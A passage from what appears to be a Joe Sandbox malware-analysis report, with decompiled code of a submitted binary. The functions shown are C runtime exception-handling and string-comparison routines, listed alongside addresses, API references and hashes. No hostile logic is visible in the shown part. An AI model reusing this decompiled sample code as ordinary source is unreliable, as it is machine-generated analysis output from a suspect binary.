																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *(E00402403(_t270, _t275, _t296, _t315) + 0x10) = _t270;
																	_t237 = E00402403(_t270, _t275, _t296, _t315);
																	_t286 = _v8;
																	 *((intOrPtr*)(_t237 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags = _t270[0x14] - 0x19930521;
													if(_t270[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t270[0x14] - 0x19930522;
														if(_t270[0x14] != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E00402403(_t270, _t275, _t296, _t315) + 0x1c));
										_t264 = E00402403(_t270, _t275, _t296, _t315);
										_push(_v16);
										 *(_t264 + 0x1c) = _t315;
										_t265 = E00403DBA(_t270, _t301, _t315, _t270);
										_pop(_t286);
										if(_t265 != 0) {
											goto L23;
										} else {
											_t301 = _v16;
											_t353 =  *_t301 - _t315;
											if( *_t301 <= _t315) {
												L62:
												E00406182(_t270, _t286, _t296, _t301, _t315, __eflags);
											} else {
												while(1) {
													_t286 =  *((intOrPtr*)(_t315 + _t301[1] + 4));
													if(E00403A16( *((intOrPtr*)(_t315 + _t301[1] + 4)), _t353, 0x4188d4) != 0) {
														goto L63;
													}
													_t315 = _t315 + 0x10;
													_t269 = _v20 + 1;
													_v20 = _t269;
													_t353 = _t269 -  *_t301;
													if(_t269 >=  *_t301) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t270);
											E00401F30(_t270, _t301, _t315, __eflags);
											_t275 =  &_v64;
											E004039C1( &_v64);
											E00403FA6( &_v64, 0x416604);
											L64:
											 *(E00402403(_t270, _t275, _t296, _t315) + 0x10) = _t270;
											_t231 = E00402403(_t270, _t275, _t296, _t315);
											_t275 = _v8;
											 *(_t231 + 0x14) = _v8;
											__eflags = _t315;
											if(_t315 == 0) {
												_t315 = _a8;
											}
											E004029A7(_t275, _t315, _t270);
											E00403CBA(_a8, _a16, _t301);
											_t234 = E00403E77(_t301);
											_t332 = _t332 + 0x10;
											_push(_t234);
											E00403C31(_t270, _t275, _t296, _t301, _t315, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}






















































































                                                              0x0040333b
                                                              0x00403342
                                                              0x00403344
                                                              0x0040334d
                                                              0x00403353
                                                              0x0040335b
                                                              0x0040335d
                                                              0x00403360
                                                              0x00403366
                                                              0x004036da
                                                              0x004036da
                                                              0x004036df
                                                              0x004036e1
                                                              0x004036e3
                                                              0x004036e6
                                                              0x004036e7
                                                              0x004036ea
                                                              0x004036f0
                                                              0x0040380f
                                                              0x004036f6
                                                              0x004036f6
                                                              0x004036f7
                                                              0x004036f8
                                                              0x004036ff
                                                              0x00403702
                                                              0x00403705
                                                              0x0040370b
                                                              0x0040370d
                                                              0x00403712
                                                              0x00403715
                                                              0x00403717
                                                              0x0040371d
                                                              0x0040371f
                                                              0x00403725
                                                              0x0040373a
                                                              0x0040373f
                                                              0x00403742
                                                              0x00403744
                                                              0x0040380b
                                                              0x00000000
                                                              0x0040380c
                                                              0x00403744
                                                              0x00403725
                                                              0x0040371d
                                                              0x00403715
                                                              0x0040374a
                                                              0x0040374d
                                                              0x00403750
                                                              0x00403753
                                                              0x00403756
                                                              0x0040375c
                                                              0x0040376e
                                                              0x00403773
                                                              0x00403776
                                                              0x00403779
                                                              0x0040377c
                                                              0x0040377f
                                                              0x00403782
                                                              0x00403785
                                                              0x00000000
                                                              0x00000000
                                                              0x0040378b
                                                              0x0040378b
                                                              0x0040378e
                                                              0x00403791
                                                              0x004037a0
                                                              0x004037a1
                                                              0x004037a1
                                                              0x004037a3
                                                              0x004037a6
                                                              0x00000000
                                                              0x00000000
                                                              0x004037a8
                                                              0x004037ab
                                                              0x00000000
                                                              0x00000000
                                                              0x004037b9
                                                              0x004037bb
                                                              0x004037be
                                                              0x004037c0
                                                              0x004037c8
                                                              0x004037c8
                                                              0x004037cb
                                                              0x004037cd
                                                              0x004037cf
                                                              0x004037eb
                                                              0x004037f0
                                                              0x004037f3
                                                              0x004037f3
                                                              0x00000000
                                                              0x004037cb
                                                              0x004037c2
                                                              0x004037c6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004037f6
                                                              0x004037f9
                                                              0x004037fa
                                                              0x004037fd
                                                              0x00403800
                                                              0x00403803
                                                              0x00403806
                                                              0x00403806
                                                              0x00000000
                                                              0x00403791
                                                              0x00403810
                                                              0x00403815
                                                              0x00403816
                                                              0x00403819
                                                              0x0040381c
                                                              0x0040381d
                                                              0x0040381e
                                                              0x0040381f
                                                              0x00403822
                                                              0x00403824
                                                              0x0040389c
                                                              0x0040389e
                                                              0x0040389e
                                                              0x00403826
                                                              0x00403826
                                                              0x00403829
                                                              0x0040382c
                                                              0x00000000
                                                              0x0040382e
                                                              0x0040382e
                                                              0x00403831
                                                              0x00403834
                                                              0x0040383b
                                                              0x0040383b
                                                              0x0040383e
                                                              0x00403840
                                                              0x00403842
                                                              0x00403874
                                                              0x00403874
                                                              0x00403877
                                                              0x0040387e
                                                              0x0040387e
                                                              0x00403881
                                                              0x00403884
                                                              0x0040388b
                                                              0x0040388b
                                                              0x0040388e
                                                              0x00403895
                                                              0x00403897
                                                              0x00403897
                                                              0x00403890
                                                              0x00403890
                                                              0x00403893
                                                              0x00000000
                                                              0x00000000
                                                              0x00403893
                                                              0x00403886
                                                              0x00403886
                                                              0x00403889
                                                              0x00000000
                                                              0x00000000
                                                              0x00403889
                                                              0x00403879
                                                              0x00403879
                                                              0x0040387c
                                                              0x00000000
                                                              0x00000000
                                                              0x0040387c
                                                              0x00403898
                                                              0x00403844
                                                              0x00403844
                                                              0x00403844
                                                              0x00403847
                                                              0x00403847
                                                              0x00403849
                                                              0x0040384b
                                                              0x00000000
                                                              0x00000000
                                                              0x0040384d
                                                              0x0040384f
                                                              0x00403863
                                                              0x00403863
                                                              0x00403851
                                                              0x00403851
                                                              0x00403854
                                                              0x00403857
                                                              0x00000000
                                                              0x00403859
                                                              0x00403859
                                                              0x0040385c
                                                              0x0040385f
                                                              0x00403861
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403861
                                                              0x00403857
                                                              0x0040386c
                                                              0x0040386c
                                                              0x0040386e
                                                              0x00000000
                                                              0x00403870
                                                              0x00403870
                                                              0x00403870
                                                              0x00000000
                                                              0x0040386e
                                                              0x00403867
                                                              0x00403869
                                                              0x00403869
                                                              0x00000000
                                                              0x00403869
                                                              0x00403836
                                                              0x00403836
                                                              0x00403839
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403839
                                                              0x00403834
                                                              0x0040382c
                                                              0x0040389f
                                                              0x004038a3
                                                              0x004038a3
                                                              0x00403375
                                                              0x00403375
                                                              0x0040337e
                                                              0x0040347b
                                                              0x0040347b
                                                              0x0040347e
                                                              0x00000000
                                                              0x004033ad
                                                              0x004033ad
                                                              0x004033b2
                                                              0x00000000
                                                              0x004033b8
                                                              0x004033b8
                                                              0x004033c0
                                                              0x00403674
                                                              0x00403678
                                                              0x004033c6
                                                              0x004033cb
                                                              0x004033ce
                                                              0x004033d3
                                                              0x004033da
                                                              0x004033df
                                                              0x00000000
                                                              0x00403417
                                                              0x0040341f
                                                              0x00403483
                                                              0x00403483
                                                              0x00403486
                                                              0x00403489
                                                              0x0040348b
                                                              0x0040348e
                                                              0x00403491
                                                              0x00403497
                                                              0x00403643
                                                              0x00403643
                                                              0x00403646
                                                              0x00000000
                                                              0x00403648
                                                              0x00403648
                                                              0x0040364b
                                                              0x00000000
                                                              0x00403651
                                                              0x00403651
                                                              0x00403654
                                                              0x00403657
                                                              0x00403658
                                                              0x00403659
                                                              0x0040365c
                                                              0x0040365d
                                                              0x00403660
                                                              0x00403661
                                                              0x00403666
                                                              0x00000000
                                                              0x00403666
                                                              0x0040364b
                                                              0x0040349d
                                                              0x0040349d
                                                              0x004034a1
                                                              0x00000000
                                                              0x004034a7
                                                              0x004034a7
                                                              0x004034ae
                                                              0x004034c6
                                                              0x004034c6
                                                              0x004034c9
                                                              0x004034cc
                                                              0x004034d2
                                                              0x004034e2
                                                              0x004034e7
                                                              0x004034ea
                                                              0x004034ed
                                                              0x004034f0
                                                              0x004034f3
                                                              0x004034f6
                                                              0x004034f9
                                                              0x004034ff
                                                              0x004034ff
                                                              0x00403502
                                                              0x00403505
                                                              0x00403514
                                                              0x00403515
                                                              0x00403515
                                                              0x00403517
                                                              0x0040351a
                                                              0x00403520
                                                              0x00403523
                                                              0x00403529
                                                              0x0040352b
                                                              0x0040352e
                                                              0x00403531
                                                              0x00403537
                                                              0x0040353a
                                                              0x0040353f
                                                              0x0040353f
                                                              0x00403542
                                                              0x00403545
                                                              0x00403548
                                                              0x0040354b
                                                              0x0040354e
                                                              0x00403553
                                                              0x00403554
                                                              0x00403555
                                                              0x00403556
                                                              0x00403557
                                                              0x0040355a
                                                              0x0040355d
                                                              0x0040355f
                                                              0x00000000
                                                              0x00403561
                                                              0x00403561
                                                              0x00403561
                                                              0x00403562
                                                              0x00403564
                                                              0x00403567
                                                              0x00403568
                                                              0x0040356d
                                                              0x00403570
                                                              0x00403572
                                                              0x00000000
                                                              0x00000000
                                                              0x00403574
                                                              0x00403577
                                                              0x00403578
                                                              0x0040357b
                                                              0x0040357d
                                                              0x00000000
                                                              0x0040357f
                                                              0x0040357f
                                                              0x00403582
                                                              0x00000000
                                                              0x00403582
                                                              0x00000000
                                                              0x0040357d
                                                              0x00403596
                                                              0x0040359c
                                                              0x004035b9
                                                              0x004035be
                                                              0x004035be
                                                              0x004035c1
                                                              0x004035c1
                                                              0x00000000
                                                              0x00403585
                                                              0x00403585
                                                              0x00403586
                                                              0x00403589
                                                              0x0040358c
                                                              0x0040358f
                                                              0x0040358f
                                                              0x00000000
                                                              0x00403594
                                                              0x00403531
                                                              0x00403523
                                                              0x004035c4
                                                              0x004035c7
                                                              0x004035c8
                                                              0x004035cb
                                                              0x004035ce
                                                              0x004035d1
                                                              0x004035d4
                                                              0x004035d4
                                                              0x004035dd
                                                              0x004035e0
                                                              0x004035e0
                                                              0x004034f9
                                                              0x004035e3
                                                              0x004035e7
                                                              0x004035e9
                                                              0x004035ec
                                                              0x004035f2
                                                              0x004035f2
                                                              0x004035fa
                                                              0x004035ff
                                                              0x00403669
                                                              0x00403669
                                                              0x0040366e
                                                              0x00403672
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00403601
                                                              0x00403604
                                                              0x00403607
                                                              0x0040360b
                                                              0x00403619
                                                              0x0040361b
                                                              0x00403632
                                                              0x00403636
                                                              0x0040363c
                                                              0x0040363d
                                                              0x0040363f
                                                              0x00000000
                                                              0x00403641
                                                              0x00000000
                                                              0x00403641
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040360d
                                                              0x0040360d
                                                              0x0040360f
                                                              0x00000000
                                                              0x00403611
                                                              0x00403611
                                                              0x00403615
                                                              0x00000000
                                                              0x00403617
                                                              0x0040361d
                                                              0x00403622
                                                              0x00403625
                                                              0x0040362a
                                                              0x0040362d
                                                              0x00000000
                                                              0x0040362d
                                                              0x00403615
                                                              0x0040360f
                                                              0x0040360b
                                                              0x004034b0
                                                              0x004034b0
                                                              0x004034b7
                                                              0x00000000
                                                              0x004034b9
                                                              0x004034b9
                                                              0x004034c0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004034c0
                                                              0x004034b7
                                                              0x004034ae
                                                              0x004034a1
                                                              0x00403421
                                                              0x00403429
                                                              0x0040342c
                                                              0x00403431
                                                              0x00403435
                                                              0x00403438
                                                              0x0040343e
                                                              0x00403441
                                                              0x00000000
                                                              0x00403443
                                                              0x00403443
                                                              0x00403446
                                                              0x00403448
                                                              0x00403679
                                                              0x00403679
                                                              0x00000000
                                                              0x0040344e
                                                              0x00403456
                                                              0x00403461
                                                              0x00000000
                                                              0x00000000
                                                              0x0040346a
                                                              0x0040346d
                                                              0x0040346e
                                                              0x00403471
                                                              0x00403473
                                                              0x00000000
                                                              0x00403479
                                                              0x00000000
                                                              0x00403479
                                                              0x00000000
                                                              0x00403473
                                                              0x0040344e
                                                              0x0040367e
                                                              0x0040367e
                                                              0x00403680
                                                              0x00403681
                                                              0x00403688
                                                              0x0040368b
                                                              0x00403699
                                                              0x0040369e
                                                              0x004036a3
                                                              0x004036a6
                                                              0x004036ab
                                                              0x004036ae
                                                              0x004036b1
                                                              0x004036b3
                                                              0x004036b5
                                                              0x004036b5
                                                              0x004036ba
                                                              0x004036c6
                                                              0x004036cc
                                                              0x004036d1
                                                              0x004036d4
                                                              0x004036d5
                                                              0x00000000
                                                              0x004036d5
                                                              0x00403441
                                                              0x0040341f
                                                              0x004033df
                                                              0x004033c0
                                                              0x004033b2
                                                              0x0040337e

                                                              APIs
                                                              • type_info::operator==.LIBVCRUNTIME ref: 0040345A
                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00403568
                                                              • _UnwindNestedFrames.LIBCMT ref: 004036BA
                                                              • CallUnexpected.LIBVCRUNTIME ref: 004036D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 2751267872-393685449
                                                              • Opcode ID: 84e90d107850ba68984f0374c74d9d647df64166b6b85148c58019ec3215ba6b
                                                              • Instruction ID: 326e648ef647dd601b0ca67ad18aa5df6b903cc15dab9f90c6c3f42a64a10276
                                                              • Opcode Fuzzy Hash: 84e90d107850ba68984f0374c74d9d647df64166b6b85148c58019ec3215ba6b
                                                              • Instruction Fuzzy Hash: 0CB17671800209AFCF25DFA5C8819AEBFB9BF04316B14456BE8017B392C779DB51CB99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040E7BE Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 82%
                                                              			E0040E7BE(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				int _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				int _t71;
				char* _t76;
				char* _t77;
				int _t81;
				int _t82;
				intOrPtr _t94;
				intOrPtr _t95;
				signed int _t103;
				void* _t104;
				int _t106;
				void* _t107;
				intOrPtr* _t108;

				_t49 =  *0x418014; // 0xfc7b77c5
				_v8 = _t49 ^ _t103;
				_t83 = _a24;
				_v40 = _a4;
				_t102 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t102 <= 0) {
					if(_t102 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t81 = E0040E7A2(_t53, _t102);
					_t83 = _v36;
					_t102 = _t81;
					L3:
					_t101 = _a28;
					if(_t101 <= 0) {
						if(_t101 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t101 = E0040E7A2(_t83, _t101);
						_a28 = _t101;
						L6:
						_t82 = _a32;
						if(_t82 == 0) {
							_t82 =  *( *_v40 + 8);
							_a32 = _t82;
						}
						if(_t102 == 0 || _t101 == 0) {
							if(_t102 == _t101) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t101 > 1) {
									L32:
									_t54 = 1;
								} else {
									if(_t102 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t82,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t102 <= 0) {
												if(_t101 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t76 =  &_v22;
														if(_v22 != 0) {
															_t101 = _v36;
															while(1) {
																_t94 =  *((intOrPtr*)(_t76 + 1));
																if(_t94 == 0) {
																	goto L32;
																}
																_t100 =  *_t101;
																if(_t100 <  *_t76 || _t100 > _t94) {
																	_t76 = _t76 + 2;
																	if( *_t76 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t77 =  &_v22;
													if(_v22 != 0) {
														_t102 = _v32;
														while(1) {
															_t95 =  *((intOrPtr*)(_t77 + 1));
															if(_t95 == 0) {
																goto L22;
															}
															_t100 =  *_t102;
															if(_t100 <  *_t77 || _t100 > _t95) {
																_t77 = _t77 + 2;
																if( *_t77 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
												_pop(_t54);
											}
										}
									}
								}
							}
						} else {
							L33:
							_t59 = E00409976(_t82, 9, _v32, _t102, 0, 0);
							_t106 = _t104 + 0x18;
							_v40 = _t59;
							if(_t59 == 0) {
								L54:
								_t54 = 0;
							} else {
								_t100 = _t59 + _t59 + 8;
								asm("sbb eax, eax");
								_t60 = _t59 & _t59 + _t59 + 0x00000008;
								if(_t60 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t60 > 0x400) {
										_t82 = E0040A6A3(_t60);
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xdddd;
											goto L40;
										}
									} else {
										E00410C20(_t60);
										_t82 = _t106;
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xcccc;
											L40:
											_t82 = _t82 + 8;
											if(_t82 == 0) {
												goto L60;
											} else {
												_t102 = _a32;
												_t63 = E00409976(_a32, 1, _v32, _a32, _t82, _v40);
												_t107 = _t106 + 0x18;
												if(_t63 == 0) {
													L58:
													_push(_t82);
													L59:
													E0040A7F2();
													goto L53;
												} else {
													_t101 = _v36;
													_t64 = E00409976(_t102, 9, _v36, _v36, 0, 0);
													_t108 = _t107 + 0x18;
													_v32 = _t64;
													if(_t64 == 0) {
														goto L58;
													} else {
														_t100 = _t64 + _t64 + 8;
														asm("sbb eax, eax");
														_t65 = _t64 & _t64 + _t64 + 0x00000008;
														if(_t65 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t65 > 0x400) {
																_t101 = E0040A6A3(_t65);
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xdddd;
																	goto L49;
																}
															} else {
																E00410C20(_t65);
																_t101 = _t108;
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xcccc;
																	L49:
																	_t101 = _t101 + 8;
																	if(_t101 == 0) {
																		goto L57;
																	} else {
																		if(E00409976(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
																			_t71 = E0040ADC3(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
																			_t102 = _t71;
																			E0040A7F2(_t101);
																			E0040A7F2(_t82);
																			_t54 = _t71;
																		} else {
																			_push(_t101);
																			L52:
																			E0040A7F2();
																			E0040A7F2(_t82);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return E00401BE5(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
			}

































                                                              0x0040e7c6
                                                              0x0040e7cd
                                                              0x0040e7d3
                                                              0x0040e7d7
                                                              0x0040e7de
                                                              0x0040e7e1
                                                              0x0040e7e4
                                                              0x0040e7e7
                                                              0x0040e7ea
                                                              0x0040e7f0
                                                              0x0040e805
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e7f2
                                                              0x0040e7f4
                                                              0x0040e7fb
                                                              0x0040e7fe
                                                              0x0040e80b
                                                              0x0040e80b
                                                              0x0040e810
                                                              0x0040e825
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e812
                                                              0x0040e81a
                                                              0x0040e81d
                                                              0x0040e82b
                                                              0x0040e82b
                                                              0x0040e830
                                                              0x0040e837
                                                              0x0040e83a
                                                              0x0040e83a
                                                              0x0040e83f
                                                              0x0040e84b
                                                              0x0040ea56
                                                              0x0040ea56
                                                              0x00000000
                                                              0x0040e851
                                                              0x0040e854
                                                              0x0040e8e0
                                                              0x0040e8e2
                                                              0x0040e85a
                                                              0x0040e85d
                                                              0x0040e8a5
                                                              0x0040e8a5
                                                              0x00000000
                                                              0x0040e85f
                                                              0x0040e86c
                                                              0x00000000
                                                              0x0040e872
                                                              0x0040e874
                                                              0x0040e8af
                                                              0x00000000
                                                              0x0040e8b1
                                                              0x0040e8b5
                                                              0x0040e8bb
                                                              0x0040e8be
                                                              0x0040e8c0
                                                              0x0040e8c3
                                                              0x0040e8c3
                                                              0x0040e8c8
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e8ca
                                                              0x0040e8ce
                                                              0x0040e8d8
                                                              0x0040e8de
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e8ce
                                                              0x0040e8c3
                                                              0x0040e8be
                                                              0x00000000
                                                              0x0040e8b5
                                                              0x0040e876
                                                              0x0040e87a
                                                              0x0040e880
                                                              0x0040e883
                                                              0x0040e885
                                                              0x0040e888
                                                              0x0040e888
                                                              0x0040e88d
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e88f
                                                              0x0040e893
                                                              0x0040e89d
                                                              0x0040e8a3
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e893
                                                              0x0040e888
                                                              0x0040e883
                                                              0x00000000
                                                              0x0040e8a7
                                                              0x0040e8a7
                                                              0x0040e8a7
                                                              0x0040e874
                                                              0x0040e86c
                                                              0x0040e85d
                                                              0x0040e854
                                                              0x0040e8e8
                                                              0x0040e8e8
                                                              0x0040e8f3
                                                              0x0040e8f8
                                                              0x0040e8fb
                                                              0x0040e900
                                                              0x0040ea06
                                                              0x0040ea06
                                                              0x0040e906
                                                              0x0040e909
                                                              0x0040e90e
                                                              0x0040e910
                                                              0x0040e912
                                                              0x0040ea52
                                                              0x0040ea52
                                                              0x00000000
                                                              0x0040e918
                                                              0x0040e91d
                                                              0x0040e93c
                                                              0x0040e941
                                                              0x00000000
                                                              0x0040e947
                                                              0x0040e947
                                                              0x00000000
                                                              0x0040e947
                                                              0x0040e91f
                                                              0x0040e91f
                                                              0x0040e924
                                                              0x0040e928
                                                              0x00000000
                                                              0x0040e92e
                                                              0x0040e92e
                                                              0x0040e94d
                                                              0x0040e94d
                                                              0x0040e952
                                                              0x00000000
                                                              0x0040e958
                                                              0x0040e960
                                                              0x0040e966
                                                              0x0040e96b
                                                              0x0040e970
                                                              0x0040ea4a
                                                              0x0040ea4a
                                                              0x0040ea4b
                                                              0x0040ea4b
                                                              0x00000000
                                                              0x0040e976
                                                              0x0040e97b
                                                              0x0040e982
                                                              0x0040e987
                                                              0x0040e98a
                                                              0x0040e98f
                                                              0x00000000
                                                              0x0040e995
                                                              0x0040e998
                                                              0x0040e99d
                                                              0x0040e99f
                                                              0x0040e9a1
                                                              0x0040ea46
                                                              0x0040ea46
                                                              0x00000000
                                                              0x0040e9a7
                                                              0x0040e9ac
                                                              0x0040e9cb
                                                              0x0040e9d0
                                                              0x00000000
                                                              0x0040e9d2
                                                              0x0040e9d2
                                                              0x00000000
                                                              0x0040e9d2
                                                              0x0040e9ae
                                                              0x0040e9ae
                                                              0x0040e9b3
                                                              0x0040e9b7
                                                              0x00000000
                                                              0x0040e9bd
                                                              0x0040e9bd
                                                              0x0040e9d8
                                                              0x0040e9d8
                                                              0x0040e9dd
                                                              0x00000000
                                                              0x0040e9df
                                                              0x0040e9f6
                                                              0x0040ea2d
                                                              0x0040ea33
                                                              0x0040ea35
                                                              0x0040ea3b
                                                              0x0040ea42
                                                              0x0040e9f8
                                                              0x0040e9f8
                                                              0x0040e9f9
                                                              0x0040e9f9
                                                              0x0040e9ff
                                                              0x0040ea05
                                                              0x00000000
                                                              0x0040ea05
                                                              0x0040e9f6
                                                              0x0040e9dd
                                                              0x0040e9b7
                                                              0x0040e9ac
                                                              0x0040e9a1
                                                              0x0040e98f
                                                              0x0040e970
                                                              0x0040e952
                                                              0x0040e928
                                                              0x0040e91d
                                                              0x0040e912
                                                              0x0040e900
                                                              0x0040e83f
                                                              0x0040e810
                                                              0x0040ea08
                                                              0x0040ea19

                                                              APIs
                                                              • GetCPInfo.KERNEL32(004C3280,004C3280,?,7FFFFFFF,?,0040EA8E,004C3280,004C3280,?,004C3280,?,?,?,?,004C3280,?), ref: 0040E864
                                                              • __alloca_probe_16.LIBCMT ref: 0040E91F
                                                              • __alloca_probe_16.LIBCMT ref: 0040E9AE
                                                              • __freea.LIBCMT ref: 0040E9F9
                                                              • __freea.LIBCMT ref: 0040E9FF
                                                              • __freea.LIBCMT ref: 0040EA35
                                                              • __freea.LIBCMT ref: 0040EA3B
                                                              • __freea.LIBCMT ref: 0040EA4B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: __freea$__alloca_probe_16$Info
                                                              • String ID:
                                                              • API String ID: 127012223-0
                                                              • Opcode ID: 3e79126d1163bc3143f9fb23958c992f96591e52ada0e3cebb32aa2be204f431
                                                              • Instruction ID: f8f137e2a3d05797d4300cc06c2158c3c7d074ffb0f9cd52750916c6997d02f4
                                                              • Opcode Fuzzy Hash: 3e79126d1163bc3143f9fb23958c992f96591e52ada0e3cebb32aa2be204f431
                                                              • Instruction Fuzzy Hash: 0071E973A002055BDF20AB568C41BAF77B5AF89314F19487BE904B73C2D63DDC609BA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401D60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 68%
                                                              			E00401D60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00410D90(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x418014;
				E00401D20(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x418014);
				E004023B7(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E004023A0(_t77, 0xfffffffe, _t96, 0x418014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00402340(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
